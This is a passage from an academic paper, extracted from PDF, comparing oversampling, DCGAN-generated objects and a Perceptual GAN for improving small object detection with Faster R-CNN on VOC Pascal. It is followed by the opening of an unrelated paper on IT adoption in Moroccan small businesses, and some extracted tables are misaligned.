To address the small object detection problem numerous methods are introduced with different results. In order to cover the small object accuracy gap between one and two-stage detectors, Focal Loss [16] can successfully be applied. It involves a loss function modification that puts more emphasis on misclassified examples. The contribution of correctly learned, easy examples is diminished during the training with the focus on difficult ones. With high-resolution photos and relatively small objects, the detection accuracy can also be improved by splitting
272
M. Stacho´ n and M. Pietro´ n
the input image into tiles, with every tile separately fed into the original network. The so-called Pyramidal feature hierarchy [17] addresses the problem of scale-invariant object detection. By replacing the standard feature extractor, it allows creating better quality, high-level multi-scale feature maps. The mechanism involves two inverse pathways. The feature maps computed in the forward pass are upsampled to match the previous layer dimension and added elementwise. In this way, the abstract low-level layers are enhanced with higher-level semantically stronger features the network calculated close its head, which facilitates the detector’s small objects pick up. The evaluations on the MS COCO dataset [15] allowed increasing the overall mAP from 47.3 up to 56.9. Some other approach [18] faces problem subdomain - face detection, tries to make use of object context. The detectors are trained for different scales on features extracted from multiple layers of feature hierarchy. Using context information to improve small object accuracy is also applied in [19]. In this work, the authors firstly extract object context from surrounding pixels by using more abstract features from high-level layers. The features of the object and the context are concatenated providing enhanced object representation. The evaluation is performed on SSD with attention module (A-SSD) to allow the network to focus on important parts rather than the whole image. Comparing with conventional SSD the method achieved significant enhancement for small objects from 20.7% to 28.5%. Another modification of the Feature Proposal Network (FPN) approach applied to Faster RCNN [20] extracts features of the 3rd, 4th, and 5th convolution layers for objects and uses multiscale features to boost small object detection performance. The features from the higher levels are concatenated with the ones from the lowers into a single dimension vector, running a 1 × 1 convolution on the result. This allowed a 0.1 increase in the mAP in regards to the original Faster R-CNN model. The small number of samples issue is faced in [21], where the authors use the oversampling method as a small object dataset augmentation technique and reuse the original object to copy-paste it several times. In this way, the model is encouraged to focus on small objects, the number of matched anchors increases, which results in the higher contribution of small objects to the loss function. Evaluated on Mask R-CNN using MS COCO dataset, the small objects AP increased while preserving the same performance on other object groups. The best performance gain is achieved with oversampling ratio equal to three. Some generative models [8] attempt to achieve super-resolution representations for small objects, and in this way facilitate their detection. Those frameworks already have capabilities of inferring photo-realistic natural images for 4x upscaling factors, however, they require heavy time consumption for training. The proposed solution uses a deep residual network (Resnet [12]) in order to recover downsampled images. The model loss includes an adversarial loss, that pushes discriminator to make a distinction between super-resolution images and original ones, and content loss to achieve perceptual similarity instead of pixel space similarity. SRGAN derivative - classification-oriented SRGAN [22] append classification branch and introduce classification loss to typical SRGAN, generator of CSRGAN is trained to reconstruct realistic super-resolved images with
Chosen Methods of Improving Small Object Recognition
273
classification-oriented discriminative features from low-resolution images while discriminator is trained to predict true categories and distinguish generated SR images from original ones. Some other approach [23] proposes a data augmentation based on the foreground-background segregation model. It adds an assisting GAN network [2] to the original SSD training process. The first training phase focus on the foreground-background model and pre-training object detection. The second stage encloses a certain probability data enhancement such as color channel change, noise addition, and contrast boost. The proposed method increases the overall mAP to 78.7% (SSD300 baseline equals 77.5%). Another Super-Resolution Network SOD-MTGAN [24] aims to create the images where it will be easier for the resulting detector, which is trained along the side of the generator, to actually locate the small objects. So, the generator here is used to upsize blurred images to better quality and create descriptive features for those small objects. The discriminator, apart from differentiating between real and generated images, describes them with category score and bounding box location. The Perceptual GAN presented in [3] has the same goal as the previous super-resolution network but slightly different implementation. Its generator learns to transfigure poor representations of the small objects to super-resolved ones that are commensurate to real large objects to deceive a competing discriminator. Meanwhile, its discriminator contends with the generator to identify the generated representation and enforces an additional perceptual loss - generated super-resolution representations of small objects must be useful for the detection task. The small objects problem has been already noticed with some enhancement methods proposed, however, in this area there is still much room for improvement, as often described methods are domain-specific and apply to certain datasets. Generative Adversarial Networks are worth further exploration in the object detection area.
3
Dataset Analysis
Three size groups are extracted from the VOC Pascal dataset according to the annotation bounding boxes: small (size below 32 × 32), medium (size between 32 × 32 and 64 × 64), and big (size above 64 × 64). Corresponding XML annotations are saved per each category containing only objects with selected size. Tables 1 and 2 present object distribution in regards to the category and size, with significant variances. For the trainval dataset, small objects constitute less than 6% of the total objects count. Excluding difficult examples, this number reduces to 1.3%. Similar statistics apply to the test dataset. Those numbers confirm the problem described earlier. There is a significant disproportion in the object numerosity for different size groups. The categorized VOC Pascal dataset is introduced to the pre-trained PyTorch Faster R-CNN model described above with the accuracy metrics presented in Table 3. Overall the network’s performance on small objects (3.13%) is more than 20 times worse than on big objects (70.38%). Additionally, the number of samples per category differs substantially,
274
M. Stacho´ n and M. Pietro´ n
which at least partially concurs to the very low accuracy scores. Only 5.9% of annotated objects from trainval dataset belong to small objects, whereas medium and big objects take 15.36% and 78.74% respectively. The low number of samples and poor representation of smaller objects is one of the major obstacles in further work, as it disables the network to learn the right representation for the object detection network. The great disparity between big and small objects count bias the Faster R-CNN training to focus on bigger objects. Moreover, as shown in Table 3, there is a significant disproportion in the class numerosity. Basing on the publicly available DCGAN model, a customized, stable GAN implementation is introduced in order to increase the variety of small objects and provide clearer representation. The selected solution includes objects augmentation instead of whole images.
4
Data Augmentation with DCGAN
One of the augmentation technique used in experiments was small object generation with DCGAN (deep convolutional GAN) [28]. The model’s discriminator is made up of convolution layers, batch norm layers, and leaky ReLU activations. The discriminator input is a 3 × 32 × 32 image and the network’s output is a scalar probability that the input is from the real data distribution. The generator is comprised of a series of convolutional-transpose layers, batch norm layers, and ReLU activations. The input is a 100-dimensional latent vector, z, extracted from a standard Gaussian distribution and the output is a 3 × 32 × 32 RGB image. The initial model weights are initialized randomly with a normal distribution with mean 0 and stdev 0.02. Both models use Adam optimizers with learning rate 0.0002 and beta = 0.5. The batch size is 64. Additionally, in order to improve the network’s stability and performance, some adjustments are introduced. The training is split into two parts for the generator and the discriminator, as different batches for real and fake objects are constructed. Secondly, to equalize the generator and discriminator training progress, soft and noisy data labels are introduced. Instead of labeling real and fake data as 1 and 0, a random number from range 0.8–1.0 and 0.0–0.2 is chosen. Moreover, the generator uses dropouts after each layer (25%). The generator’s progress is assessed manually, by generating a fixed batch of latent vectors that are drawn from a Gaussian distribution and periodically input to the generator. The evaluation includes both the quality and diversity of the images in relation to the target domain. The typical training lasts from 1000–2000 epochs depending on dataset numerosity. In Fig. 1 the bird class generation is presented.
Chosen Methods of Improving Small Object Recognition
275
Table 1. Object number statistics for classes from VOC Pascal (airplane, bike, bird, boat, bottle, bus, car, cat, chair, cow) for trainval and test set with the division for small, medium, big categories Type
Airplane Bike Bird Boat Bottle Bus Car
Cat Chair Cow
Test small Test small (non diff) Trainval small Trainval small (non diff)
25 23 19 15
12 0 15 1
57 12 36 8
65 4 25 1
40 1 62 10
6 1 12 1
149 33 173 35
1 1 0 0
58 0 34 2
28 3 21 1
Test medium Trainval medium
35 39
31 36
116 119
87 90
186 168
18 18
339 398
6 9
250 258
96 56
251 273
346 367
403 444
241 283
431 404
230 1053 363 1066 242 1073 380 1140
205 279
Test big Trainval big
Table 2. Object number statistics for classes from VOC Pascal (table, dog, horse, motorbike, person, potted plant, sheep, sofa, train, tv monitor) for trainval and test set with the division for small, medium, big categories Type Test small Test small (non diff) Trainval small Trainval small (non diff) Test medium Trainval medium Test big Trainval big
Table Dog Horse Moto Person Plant
Sheep Sofa Train Tv
1 0 0 0
4 0 0 0
4 1 3 1
9 1 11 1
305 99 370 89
35 15 41 20
47 14 87 22
0 0 0 0
0 0 1 0
15 7 14 2
8 11
18 18
34 15
36 30
811 819
123 159
57 79
0 6
11 13
64 65
508 357 520 388
324 349
4111 4258
434 207 425 187
396 419
291 314
282 288
290 299
Fig. 1. DCGAN generated samples of a bird (left), original training dataset for the bird category (right)
276
M. Stacho´ n and M. Pietro´ n
Table 3. Mean average precision metric in percent for VOC Pascal small, medium, big objects for pre-trained faster R-CNN model. Below the number of samples per size category for trainval and test images (both include objects marked as difficult). As one image may contain objects from multiple size groups, it’s ID may find in different size categories. That the reason why the number of small, medium and big object images does not bring the cumulative number of images. Dataset
All objects Small objects Medium objects Big objects
mAP
69.98
3.13
12.62
70.38
Number of images (test) Number of objects (test)
4 952 14 976
366 861
995 2 326
4843 11 789
Number of images (trainval) 5 011 Number of objects (trainval) 15 662
378 924
486 2 406
4 624 12 332
GAN training requires a considerable amount of data of low dimensionality and clear representation, which results in generated objects quality. The main evaluation object detection dataset in presented work is VOC Pascal, however taking into account that it is a relatively small dataset, despite including into training all size groups for a given object. To make training of DCGAN more efficient the dataset has to be enhanced by some other images. The samples from following multiple datasets were tried for the training: Stanford-cars [25], CINIC-10, FGVC-aircraft, MS COCO, CIFAR-100 [10], 102 Category Flower Dataset, ImageNet and Caltech-UCSD. The seven categories were taken as a case study: car, airplane, tv monitor, boat, potted plant, bird and horse. Table 4 presents the datasets that are successfully applied for object generation with the corresponding count. Having to fulfill the input requirements some data preprocessing procedures had to be conducted in order to obtain a 32 × 32 RGB image. Despite the numerosity, ImageNet dataset training does not bring positive results. The representation of many images are not clear enough, multiple objects are present on single category image and downsampling high-resolution images outputs noise. Similar results are obtained for the MS COCO dataset, with the majority of rectangle objects, after downsampling to square 32 × 32 resolution, the preprocessed images present noise. In conclusion, a successful dataset for deep GAN should consist of at least several thousands of samples of low resolution, clear representation images per each generated class.
5 5.1
Augmentation Setup Oversampling Strategies
The training dataset for learning FasterRCNN is augmented with several oversampling techniques. As a common rule, the objects are copied from the original location and pasted to a different position, which does not overlap with
Chosen Methods of Improving Small Object Recognition
277
Table 4. Datasets used for DCGAN training with the cumulative number of samples per each used category Category
Datasets
Count
Car
Stanford-cars, CINIC-10, VOC Pascal
22 928
Airplane
FGVC-aircraft, CINIC-10, MS COCO, VOC Pascal
19 358
Tv monitor
MS COCO, VOC Pascal
10 175
Boat
MS COCO, CINIC-10, VOC Pascal
28 793
Potted plant CIFAR-100, ImageNet, MS COCO, 102 Category Flower Dataset, VOC Pascal
17 772
Bird
Caltech-UCSD, CINIC-10, VOC Pascal
12 363
Horse
CINIC-10, MS COCO, VOC Pascal
33 012
other objects and the image boundaries. The oversampling ratio equals three. This easy method allows enlarging the area covered by small objects and puts more emphasis on smaller object loss during the training stage. The experiment’s overview is summarized in Table 5. There are two sets of experiments conducted. In the first one, the VOC Pascal objects are used as oversampling strategy in three different scenarios. First, the original small object is picked per image and copied-pasted three times in random locations keeping the original object size (strategy 1). Second, instead of multiplying the original object, a random VOC Pascal object for the matching category is picked with returns for every copy-paste action. Each oversampled object is rescaled to a random width and height taken from a range of current width and height and 32 pixels (strategy 2). The oversampling increases the objects count, however taking into account, that the original number of small object samples is around 30 times less than the bigger ones, this oversampling strategy would result in the dataset size increased by 3, still leaving the considerable count disproportion. To address this problem, every image containing a small object is used 5 times with the described random oversampling strategy, which results in multiple original images oversampled with different objects for a given category (strategy 3). The third strategy additionally involves object class modification. The previous method is extended with the following assumption, for every picked small object a random VOC Pascal category is chosen, from the set of most numerous small test categories. This excludes the following classes: sofa, dog, table, and cat for which the number of both train and test samples is below five. The second set of experiments makes use of DCGAN generated objects. The generated objects are switched for the following categories: airplane, bird, boat, car, chair, horse, person, potted plant, and tv monitor. There are two test settings similar to the ones conducted for original VOC Pascal objects augmentation. In the first set, for every original small object, a random object of the same category is picked. For DCGAN available classes, generated objects are used, for the others (bike, bottle, bus, cow, motorbike, sheep) the samples come from VOC Pascal. Similarly to the first experiment set, every image containing a small object is used
278
M. Stacho´ n and M. Pietro´ n
for oversampling five times with the oversampling ratio equals three. The second setting preserves the conditions from the first one and additionally switches the class for every object, meanwhile increasing the oversampling strategy count. For less numerous classes with trainval count below 15 (airplane, train, bicycle, horse, motorbike, bus), the oversampling procedure is repeated 15 times, for other categories, 10 times. The detailed information about the augmented dataset numerosity for each oversampling strategy is presented in Table 6. Taking into account the datasets introduced, it is clear that some of them (strategies 1, 2 and 4) present a significant disparity in the number of samples for different categories, as they do not include the class change. In Strategy 2, person class numerosity is more than 100 times of the count for train category. To cover this imparity, the random class modification is introduced in Strategies 3 and 5, which results in more even class distributed dataset. For every experiment, VOC Pascal image file annotations are created with the corresponding objects, while erasing the original annotations in order to avoid duplicate annotations. The five resulting augmented datasets are introduced to the Faster R-CNN network separately, for each the training is combined with the original trainval VOC Pascal dataset. The results are evaluated on the original ground-truth dataset, divided into three size categories (small, medium and big). Table 5. Augmentation strategies overview Strategy 1 Oversample x3 original VOC Pascal object with random size and random location Strategy 2 Oversample x3 random VOC Pascal object of the same category with random size and location, the procedure is repeated 5 times for every small object Strategy 3 Oversample x3 random VOC Pascal object of the randomly changed category with random size and location, the procedure is repeated 5 times for every small object Strategy 4 Oversample x3, for selected classes DCGAN generated objects are used, for others random VOC Pascal objects with random size and location, the object category is preserved, the procedure is repeated 5 times for every small object Strategy 5 Oversample x3, for selected classes DCGAN generated objects are used, for others random VOC Pascal objects with random size and location, the object category is randomly chosen, the procedure is repeated 15 times for less numerous categories (aeroplane, train, bicycle, horse, motorbike, bus), 10 times for the others
5.2
Perceptual GAN
Having prepared the equally size distributed dataset and ensured that the generated objects are correctly recognized by the network, they are introduced to Perceptual GAN, which addresses the next reason of poor small object detection - their low feature representation. The PCGAN aims to generate super-resolved
Chosen Methods of Improving Small Object Recognition
279
Table 6. Augmented dataset count summary, distributed per classes and augmentation strategies. Strategies 1, 2 and 4, as they do not Include the class change, present a significant disparity in the number of samples for different categories. In strategy 2, person class numerosity is more than 100 times of the count for train category. To Cover this imparity, the random class modification is introduced in strategies 3 and 5, which results in more even class distribution. Strategy 1 Strategy 2 Strategy 3 Strategy 4 Strategy 5 All
3 696
6 810
6 810
6 810
Airplane
76
187
381
187
790
Bike
60
48
296
48
703
Bird
144
216
406
216
783
Boat
100
235
413
235
762
Bottle
248
422
414
422
829
Bus
48
120
426
120
763
Car
692
1 448
540
1 448
858
Chair
136
319
416
319
745
Cow
84
186
367
186
729
Horse
12
51
334
51
742
Motorbike
44
116
366
116
699
1 480
2 680
722
2 680
1 098
Plant
164
251
412
251
728
Sheep
348
342
457
342
882
Train
4
25
381
25
712
56
164
379
164
801
Person
Tv
12 624
large-object like representation for small objects. The approach is similar to architecture described in paper [3]. The generator model is a modified Faster RCNN network. The generator network is based on Faster R-CNN with residual branch which accepts the features from the lower-level convolutional layer (first conv layer) and passes them to the 3 × 3 and 1 × 1 convolutions, followed by max pool layer. As a next step there are two residual blocks with the layout consisting of two 3 × 3 convolutions, batch normalizations with ReLU activations which aim to learn the residual representation of small objects. The super-resolved representation is acquired by the element-wise sum of the learned residual representation and the features pooled from the fifth conv layer in the main branch. The learning objective for vanilla GAN models [27] corresponds to a minimax two-player game, which is formulated as (Eq. 1): min, max L(D, G) = Ex∼pdata(x) logD(x) + Ez∼pdata(z) [log(1 − D(G(z)))] (1) G
D
G represents a generator that learns to map data z (with the noise distribution pz (z)) to the distribution pdata (x) over data x. D represents a discriminator that estimates the probability of a sample coming from the data distribution pdata (x) rather than pz (z). The training procedure for G is to maximize the probability of D making a mistake.
280
M. Stacho´ n and M. Pietro´ n
The x and z are the representations for both large objects and small objects, i.e., Fl and Fs respectively. The goal is to learn a generator function which transforms the representations of a small object Fs to a super-resolved one G(Fs ) that is similar to the original one of the large object Fl . Therefore, a new conditional generator model is introduced which is conditioned on the extra auxiliary information, i.e., the low level features of the small object f from which the generator learns to generate the residual representation between the representations of large and small objects through residual learning (Eq. 2). min, max L(D, G) = EFl ∼pdata(Fl ) logD(Fl )+EFs ∼pFs [log(1−D(Fs +G(Fs |f )))] G
D
(2) In this case, the generator training can be substantially simplified over directly learning the super-resolved representations for small objects. For example, if the input representation is from a large object, the generator only needs to learn a zero-mapping. The original’s paper discriminator consists of two branches [3]: adversarial to distinguish generated super resolved representation from the original one for the large object and perception, to validate the accuracy influence of generated super-resolved features. In this solution, the perception branch is omitted with the main emphasis put on an adversarial branch. The adversarial branch consists of three fully connected layers, followed by sigmoid activation producing an adversarial loss. For the training purpose, there are two datasets prepared, containing images with only small and big objects respectively. The images are resized to 1000 × 600 pixels. To solve the adversarial min-max problem the parameters in the generator and the discriminator networks are optimized. Denote GΘg as the generator network with parameters Θg . The Θg is obtained by optimizing the loss function Ldis (Ldis is the adversarial loss, Eq. 3). Θg = arg min Ldis (GΘg (Fs )) Θg
(3)
Suppose DΘa is the adversarial branch of the discriminator network parameterized by Θa . The Θa is obtained by optimizing a specific loss function La (Eq. 4). (4) Θa = arg min La (GΘG (Fs ), Fl ) Θa
The loss La is defined as: La = −logDΘa (Fl ) + log(1 − DΘa (Fs + GΘG (Fs )))]
(5)
The La loss encourages the discriminator network to distinguish the difference between the currently generated super-resolved representation for the small object and the original one from the real large object. In the first phase, the generator is fed with large objects with the real batch forward pass through the discriminator. Next, the generator is trained with the small object dataset, trying to maximize the loss log(D(G(z)), where G(z) is the fake super-resolved small object image. The generator’s loss, apart from
Chosen Methods of Improving Small Object Recognition
281
the adversarial loss justifying the probability of the input belonging to a large object, acknowledges the RPN and ROI losses. The whole network is trained with Stochastic Gradient Descent with the momentum 0.9 and learning rate 0.0005. The perceptual GAN training is performed separately for two oversampled datasets representing the small object dataset and original VOC Pascal trainval set for large objects. For the small object dataset, the oversampling strategy with VOC Pascal objects combined with the random class switch was used. First, the evaluation is conducted on VOC small objects subset. Then ensemble model is created with original Faster-RCNN and PCGAN and voting mechanism is added at the end. This solution allows to detect large objects at the similar level as before and increase detection accuracy of small objects.
6
Results
Table 7 shows the mAP score achieved by the FasterRCNN model trained with datasets obtained with described augmentation strategies, evaluated on the original VOC Pascal dataset. Table 7. Evaluation of different augmentation strategies, described in Sect. 5. The tests are conducted on VOC Pascal dataset, splitted into three size categories (see Sect. 5.1). Mean average precision is given as percentage value with additional information about the augmented small object train dataset count Strategy Original
Small obj count mAP - small mAP - medium mAP - big 861
3.10
12.62
70.38
Strategy 1
3696
5.79
12.71
66.80
Strategy 2
6810
5.84
12.95
67.75
Strategy 3
6810
7.08
14.17
66.73
Strategy 4
6810
5.47
13.56
67.84
Strategy 5 12 624
7.60
16.28
67.01
The strategies including random class modification for oversampling with VOC Pascal and generated objects (strategies 3 and 5) outperform the original results by 3.98% and 4.5% respectively. Generally, by increasing the number of samples during the training, the mAP on small objects can be improved without any model modification. As proved, even the most naive solution, by oversampling the original object without any changes allowed to achieve almost two times better score. The most gain is observed with oversampling using DCGAN generated objects. However, the accuracy differences between using VOC Pascal and generated objects are quite low (∼0.6%). In addition, augmenting small objects affected medium objects’ performance. In case of the first two strategies, mAP remained unchanged, for the other cases it achieved a better score than
282
M. Stacho´ n and M. Pietro´ n
the original. The best performance is registered for the last oversampling strategy, which assumed augmentation with generated objects together with random class switch with a score 16.28%. It outperforms original results and augmented by VOC objects by 3.66% and 2.11% respectively. Summing up, the strategy 5 oversampling method produced the overall best results. Firstly, due to the highest number of samples used distributed evenly between categories, secondly by enhancing the representation of the objects. In order to demonstrate where does the improvement come from, FasterRCNN results over classes are presented. Tables 8 and 9 show the results of oversampling scenarios evaluated on test VOC Pascal dataset splitted by categories. Overall, the presented augmentation strategies bring improvement to most analyzed categories with oversampling performed. This applies to the following classes: airplane, bird, boat, bus, car, cow, horse, motorcycle, person, potted plant, sheep and tv monitor. As explained in Sect. 4 some categories are not the subject to augmentation procedure due to very low number of original train and test samples (sofa, dog, table and cat). For the remaining classes: bike, bottle, chair, despite boosting the trainval set representation, there is no detection improvement observed. The reason might be the quality and the features of the train and test subset for those categories, where the majority of small objects is classified as difficult. This outcome is also confirmed by the chair class, where applying representative DCGAN generated objects, once again does not influence the achieved mAP score as all 58 test objects are difficult ones. Additionally, it is worth mentioning that the context plays a significant role for the airplane category. The best results are obtained for the second strategy with no class change. Another interesting observation is the fact that the bird and cow are the categories that benefits most from DCGAN generated objects. The mAP score for bird is 5.34%, which is 4.45% and 1.6% better than the original and best VOC oversampling strategy, respectively. The cow category has at least two times better mAP score using DCGAN based oversampling. On the other hand the airplane is the only category, for which the generated objects used in strategy 5 do not improve the detection accuracy. Table 8. VOC Pascal categories mAP scores (airplane, bike, bird, boat, bottle, bus, car, chair, cow) for trainval and test set with the division for small, medium, big categories. Mean average precision is given as percentage value Type
Airplane Bike Bird Boat Bottle Bus Car Chair Cow
Orginal
6.09
0.00 0.89 1.19
Strategy 1
0.00
0.00 2.19 0.00
3.16
7.04
0.00 0.69 1.09
0.00
0.00 4.31 0.00
10.98
Strategy 2 18.70
0.00 2.04 0.00
0.00
0.83 4.26 0.00
4.16
Strategy 3 10.72
0.00 3.74 0.85
0.00
2.38 4.38 0.00
7.08
Strategy 4
2.42
0.00 5.34 1.47
0.00
0.00 4.39 0.00
22.52
Strategy 5
5.37
0.00 1.66 1.36
0.00
0.00 3.99 0.00
41.52
Chosen Methods of Improving Small Object Recognition
283
Table 9. VOC Pascal categories mAP scores (horse, motorbike, person, potted plant, sheep and tv monitor) for trainval and test set with the division for small, medium, big categories. Mean average precision is given as percentage value Type
Horse Moto Person Plant Sheep Tv
Original
2.63
0.00
0.92
0.44
20.07
Strategy 1 2.56
3.57
1.24
3.93
29.09 16.34
Strategy 2 3.03
4.00
1.28
5.17
25.29 13.07
Strategy 3 7.14
5.00
1.43
4.75
34.16 17.47
Strategy 4 1.96
2.17
1.32
2.31
27.39
Strategy 5 3.03
5.55
1.17
1.03
25.66 16.43
6.20
5.23
Table 10 provides the summary of PCGAN training results on augmented VOC Pascal. For this process, the third oversampling strategy dataset is used as a small object image dataset, instead of original VOC Pascal, in order to obtain similar number of small and big objects, required for the training phase. Overall, PCGAN allowed increasing mAP for small objects in nine presented classes. It is apparent, that the solution allows much better performance than simple augmentation strategies. The most gain in the mAP score is observed for the motorcycle class, from the original 0%, through 5% (oversampling) up to 50% (perceptual GAN). The other significant improvement represent bird category with a score 11.62%, which is 2.3 and 13.1 times better than oversampling and original result. For aeroplane, boat, bus, cow, sheep and tv monitor categories the mAP performance fluctuates around 1.5 times better than oversampling score. Worth mentioning is a cow class, for which FasterRCNN achieved over 65% accuracy. The following observation may be extracted at this point. Firstly, the Perceptual GAN can be successfully extended to natural scene image dataset from its initial application. Secondly, the dedicated solution, such as PCGAN, despite heavier training procedure (generator and discriminator), allows to achieve significantly better detection accuracy for small objects than augmentation methods. The described solution may be efficiently employed with the original FasterRCNN as a parallel network and forms ensemble model. The second possibility is to use conditional generator as described in Sect. 5.2. In both solutions the original mAP score for big objects is preserved. The small object mAP is significantly improved. The score for medium object is at the same level or slightly better than in original model. After applying these approaches mAP for whole dataset is improved up to 0.3% (from 69.98% up to ∼70.3%). The small increase is dictated by small percentage of small and medium objects in test dataset (Table 1 and 2).
284
M. Stacho´ n and M. Pietro´ n
Table 10. Evaluation of PCGAN training described in Sect. 5.2. The results are presented in comparison with original FasterRCNN and oversampling strategy that received best score for given category. All three tests are conducted on small object VOC Pascal test group. Mean average precision is given as percentage value
Strategy Original
Aeroplane Bird
Boat Bus Cow
Horse Moto Sheep Tv
6.09
0.89 1.20
0.00
3.16 2.63
0.00
20.07
Best oversampling 18.70
5.34 1.47
2.38 41.52 7.14
5.55
34.16 17.47
11.62 2.49
3.45 65.19 9.09
50.0
44.58 27.27
PCGAN
28.97
6.20
For all simulation presented in the paper the ratios of width and height of the generated FasterRCNN anchors used are 0.5, 1 and 2. The areas of anchors (anchor scales) are defined as 8, 16 and 32 with the feature stride equal 16. The learning rate is 0.01.
7
Conclusions and Future Work
The work presents comparison of few strategies for improving small object detection. The presented results show that solution with GAN architecture outperforms other well known augmentation approaches. The perceptual GAN is significantly better than oversampling strategies based on DCGAN image generation. It achieves better results with the similar amount of the training data. It is worth noting that all presented approaches required a 10–20 fold increase in the number of small objects. Future work will concentrate on further improvements using perceptual GAN. The experiments will focus on perceptual GAN architecture exploration. Next, the solution will be tested on other object detection datasets.
References 1. Ren, S., Ross, K.H., Sun, G.J.: Faster R-CNN: towards real-time object detection with region proposal networks. https://papers.nips.cc/paper/5638-faster-rcnn-towards-real-time-object-detection-with-region-proposal-networks.pdf 2. Goodfellow, I., et al.: Generative adversarial nets. In: Advances in Neural Information Processing Systems, pp. 2672–2680 (2014). http://papers.nips.cc/paper/ 5423-generative-adversarial-nets.pdf 3. Li, J., Liang, X., Wei, Y., Xu, T., Feng, J., Yan, S.: Perceptual generative adversarial networks for small object detection (2017). https://arxiv.org/pdf/1706.05274. pdf 4. Everingham, M., van Gool, L., Williams, C., Winn, J., Zisserman, A.: The PASCAL visual object classes homepage (2014). http://host.robots.ox.ac.uk/pascal/VOC/ 5. Girshick, R., Donahue, J., Darrell, T., Malik, J.: Rich feature hierarchies for accurate object detection and semantic segmentation (2014). https://arxiv.org/pdf/ 1311.2524.pdf
Chosen Methods of Improving Small Object Recognition
285
6. Redmon, J., Divvala, S., Girshick, R., Farhadi, A.: You only look once: unified, real-time object detection (2016). https://arxiv.org/pdf/1506.02640.pdf 7. Liu, W., et al.: SSD: single shot multibox detector (2016). https://arxiv.org/pdf/ 1512.02325.pdf 8. Ledig, C., et al.: Twitter. Photo-Realistic Single Image Super-Resolution Using a Generative Adversarial Network (2017). https://arxiv.org/pdf/1609.04802.pdf 9. Radford, A., Metz, L., Chintala, S.: Unsupervised representation learning with deep convolutional generative adversarial networks (2016). https://arxiv.org/pdf/ 1511.06434.pdf 10. Krizhevsky, A., Nair, V., Hinton, G.: Cifar-10, Cifar-100 dataset (2009). https:// www.cs.toronto.edu/kriz/cifar.html 11. Simonyan, K., Zisserman, A.: Very deep convolutional networks for large-scale image recognition (2015). https://arxiv.org/pdf/1409.1556.pdf 12. He, K., Zhang, X., Ren, S., Sun, J.: Deep residual learning for image recognition (2015). https://arxiv.org/pdf/1512.03385.pdf 13. Frid-Adar, M., Diamant, I., Klang, E., Amitai, M., Goldberger, J., Greenspan, H.: GAN-based synthetic medical image augmentation for increased CNN performance in liver lesion classification (2018). https://arxiv.org/pdf/1803.01229.pdf 14. Xiao, C., Li, B., Zhu, J.-Y., He, W., Liu, M., Song, D.: Generating adversarial examples with adversarial networks (2019). https://arxiv.org/pdf/1801.02610.pdf 15. Lin, T.-Y., et al.: Microsoft COCO: common objects in context (2015). https:// arxiv.org/pdf/1405.0312.pdf 16. Lin, T.-Y., Goyal, P., Girshick, R., He, K., Dollar, P.: Focal loss for dense object detection (2018). https://arxiv.org/pdf/1708.02002.pdf 17. Lin, T.-Y., Dollar, P., Girshick, R., He, K., Hariharan, B., Belongie, S.: Feature pyramid networks for object detection (2017). https://arxiv.org/pdf/1612.03144. pdf 18. Hu, P., Ramanan, D.: Finding tiny faces (2017). https://arxiv.org/pdf/1612.04402. pdf 19. Lim, J.-S., Astrid, M., Yoon, H.-J., Lee, S.-I.: Small object detection using context and attention (2019). https://arxiv.org/pdf/1912.06319.pdf 20. Hu, G., Yang, Z., Hu, L., Huang, L., Han, J.: Small object detection with multiscale features. Int. J. Digit. Multimedia Broadcast. 1–10 (2018) 21. Kisantal, M., Wojna, Z., Murawski, J., Naruniec, J., Cho, K.: Augmentation for small object detection (2019). https://arxiv.org/pdf/1902.07296.pdf 22. Chen, Y., Li, J., Niu, Y., He, J.: Small object detection networks based on classification-oriented super-resolution GAN for UAV aerial imagery. In: Chinese Control And Decision Conference (CCDC), pp. 4610–4615 (2019) 23. Jiang, W., Ying, N.: Improve object detection by data enhancement based on generative adversarial nets. https://arxiv.org/pdf/1903.01716.pdf 24. Bai, Y., Zhang, Y., Ding, M., Ghanem, B.: SOD-MTGAN: small object detection via multi-task generative adversarial network (2018) 25. Krause, J., Stark, M., Deng, J., Fei-Fei, L.: 3D object representations for finegrained categorization. In: 4th International IEEE Workshop on 3D Representation and Recognition (3dRR-13), Sydney, Australia (2013) 26. Goodfellow, I.J., Shlens, J., Szegedy, C.: Explaining and harnessing adversarial examples, arXiv preprint arXiv:1412.6572 (2014) 27. Goodfellow, I., et al.: Generative adversarial nets. In: NIPS, pp. 2672–2680 (2014) 28. Radford, A., Metz, L., Chintala, S.: Unsupervised representation learning with deep convolutional generative adversarial networks (2016)
Factors Affecting the Adoption of Information Technology in the Context of Moroccan Smes Yassine Zouhair(B) , Mustapha Belaissaoui, and Younous El Mrini SIAD Laboratory, Hassan First University of Settat, Settat, Morocco {y.zouhair,mustapha.belaissaoui,younous.elmrini}@uhp.ac.ma
Abstract. Today, information technology (IT) has become the foundation for streamlining processes, optimizing costs and organizing information, transforming traditional business models into dynamic enterprises that make their operations profitable through technology. The accelerated adoption of IT as a service solutions is one of the fastest growing trends among businesses of all sizes. Despite the great benefits they are expected to bring to businesses, the level of IT usage in Moroccan small and medium-sized enterprises (SME) remains very low. This article attempts to identify the factors that influence the adoption of IT in the context of Moroccan SMEs. We applied a qualitative research approach using the interview technique. The population of this study includes team leaders, users, internal IT managers, external consultants and individuals who are familiar with the Moroccan SME sector with different levels of education and experience. The research results indicate that several determinants affect the willingness of SMEs to adopt IT. These determinants are of two types: internal determinants, which refer to organizational and individual factors, also referred to as factors specific to the organization; and external determinants, which include factors specific to the technology, and factors related to the environment in which the organization operates. Keywords: IT · Adoption · Challenges · Integrated IS · Moroccan SMEs
1 Introduction Today’s company is faced with a constantly changing economic context, strong economic pressures and strategic decisions critical to its survival: • • • • • •
Increasingly fierce competition. Rapid commercial reactivity. Need to innovate. Increasing overhead costs. Cost reduction requirements to remain competitive. Obligation to follow new technologies.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 286–296, 2023. https://doi.org/10.1007/978-3-031-28073-3_20
Factors Affecting the Adoption of Information Technology
287
